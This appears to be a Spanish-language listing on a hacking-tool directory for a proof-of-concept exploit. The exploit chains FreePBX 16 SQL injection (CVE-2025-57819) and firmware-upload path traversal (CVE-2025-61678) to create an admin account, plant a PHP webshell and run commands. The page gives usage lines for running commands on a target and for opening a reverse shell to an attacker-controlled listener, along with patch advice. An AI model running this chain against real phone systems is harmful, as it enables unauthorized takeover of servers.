Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-57819-RCE — CVE-2025-57819-RCE_PoC | Kitploit
Herramientas/GitHubGitHub/teteren/cve-2025-57819-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubteteren/cve-2025-57819-rce

CVE-2025-57819-RCE

CVE-2025-57819-RCE_PoC

Ver Repositorio
hace 19 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

FreePBX 16 — Unauthenticated SQLi to RCE

Resumen: Este documento muestra cómo combinar dos vulnerabilidades de FreePBX 16 (CVE-2025-57819 y CVE-2025-61678) para lograr una cadena de ataque completa que permite escalar desde el acceso no autenticado hasta la ejecución remota de código (Remote Code Execution, RCE).

Información de las vulnerabilidades CVE

ID de CVEComponente afectadoImpacto y tipo de vulnerabilidad
CVE-2025-57819Cargador del módulo Endpoint (parámetro brand)Inyección SQL apilada no autenticada (Unauthenticated Stacked SQL Injection)
CVE-2025-61678Procesador de carga de firmware de Endpoint Manager (parámetro fwbrand)Subida arbitraria de archivos autenticada / salto de ruta (Path Traversal)

Principio y proceso del ataque

Crear la cuenta de administrador (CVE-2025-57819)

Al desencadenar la vulnerabilidad de inyección SQL apilada no autenticada a través del cargador de módulos con espacio de nombres (Namespaced Endpoint Loader), se escribe directamente una cuenta de administrador nueva con todos los privilegios en la tabla ampusers.

Autenticación (Authentication)

Utilice las credenciales de administrador recién creadas para iniciar sesión en la interfaz de administración de FreePBX.

Escribir el WebShell (CVE-2025-61678)

Se abusa de la función de carga de firmware de Endpoint Manager y, combinándola con la vulnerabilidad de path traversal del parámetro fwbrand (../../../var/www/html/<dir>), se escribe directamente un WebShell en PHP en el directorio raíz del sitio web.

Ejecución de comandos (Execution)

Invoque el WebShell desplegado para ejecutar un único comando del sistema o establezca una Reverse Shell interactiva.

Versiones afectadas y recomendaciones de corrección

Versiones afectadas:

  • FreePBX 16 (versión del módulo Endpoint anterior a 16.0.92)
  • FreePBX 17 (corregida en la versión 17.0.6; versiones anteriores afectadas)

Recomendación de corrección: actualice lo antes posible a la última versión parcheada.

Instrucciones de uso (Usage)

root@kitploit:~
# Ejecutar un solo comando
python3 exploit.py --rhost pbx.example.com --command "id"

# Crear una Reverse Shell interactiva (escucha automática con pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# Usar HTTP simple con un puerto personalizado
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Descripción de parámetros (Options)

ParámetroDescripción
--rhost[Obligatorio] Dirección del host de destino (Target Host)
--rportPuerto de destino (por defecto: 443)
--httpFuerza el uso de HTTP en lugar del HTTPS predeterminado
Descargar herramienta